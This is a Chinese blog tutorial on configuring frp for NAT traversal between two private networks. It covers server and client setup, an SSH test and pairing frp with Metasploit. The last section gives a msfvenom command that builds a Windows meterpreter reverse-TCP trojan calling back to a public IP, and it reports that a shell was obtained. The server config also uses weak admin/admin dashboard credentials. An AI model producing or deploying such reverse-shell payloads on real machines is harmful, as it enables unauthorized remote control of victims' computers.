frp内网穿透教程2022最新(含内网ssh配置与msf联动配置)


1、frp简介

1.1 为什么要使用frp

两台不同内网的机器,是没有办法直接进行访问的,通过配置frp内网穿透,可以实现将2台不同内网的机器实现互联

1.2 使用frp之前

一定要有一个公网的ip,去买个云服务器就行,企鹅云的服务器现在新用户也就65一个月

1.3 frp下载地址

根据不同的系统需求,下载不同的frp版本就行,linux就下载如下图所示的版本

2、frp的配置与使用,配置的过程分为两个部分,一是服务器端(外网服务器)的配置;二是客户端(内网服务器)配置。

2.1配置服务端

将下载好后的frp文件上传到服务器,使用如下命令解压

tar -zxvf frp_0.44.0_linux_amd64.tar.gz

之后使用cd命令进入解压之后的文件夹

cd frp_0.44.0_linux_amd64/

使用vim frps.ini命令进入编辑模式,写入如下信息

[common]
# frp监听的端口,默认是7000
bind_port = 7000
# 授权码
token =aini123
# 这个token之后在客户端会用到

# frp管理后台端口
dashboard_port = 8000
# frp管理后台用户名和密码
dashboard_user = admin
dashboard_pwd = admin
enable_prometheus = true

# frp日志配置
log_file = /var/log/frps.log
log_level = info
log_max_days = 3

配置完成后如下图 启动frp服务

./frps -c ./frps.ini

启动成功如下图 之后输入服务端ip:8000能出现如下页面,就说明配置完成了

2.2配置客户端

同上方法,在客户端上传解压文件,进入解压的文件夹

使用vim frpc.ini 编辑客户端配置文件,内容如下

配置好后如下图: 使用./frpc -c ./frpc.ini命令启动客户端,会出现如下连接成功的显示,如果连接失败,记得注释不要和配置代码放同一行就不会报错了

3、测试ssh连接

4、测试msf连接

msf制作一个反弹木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=公网ip lport=6000 --platform win -f exe -o msf.exe

msf设置监听5555端口 靶机打开反弹连接的木马,成功获取shell

原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/tech/database/290163.html

(0)
上一篇 2022年9月29日 04:51
下一篇 2022年9月29日 05:33

相关推荐

发表回复

登录后才能评论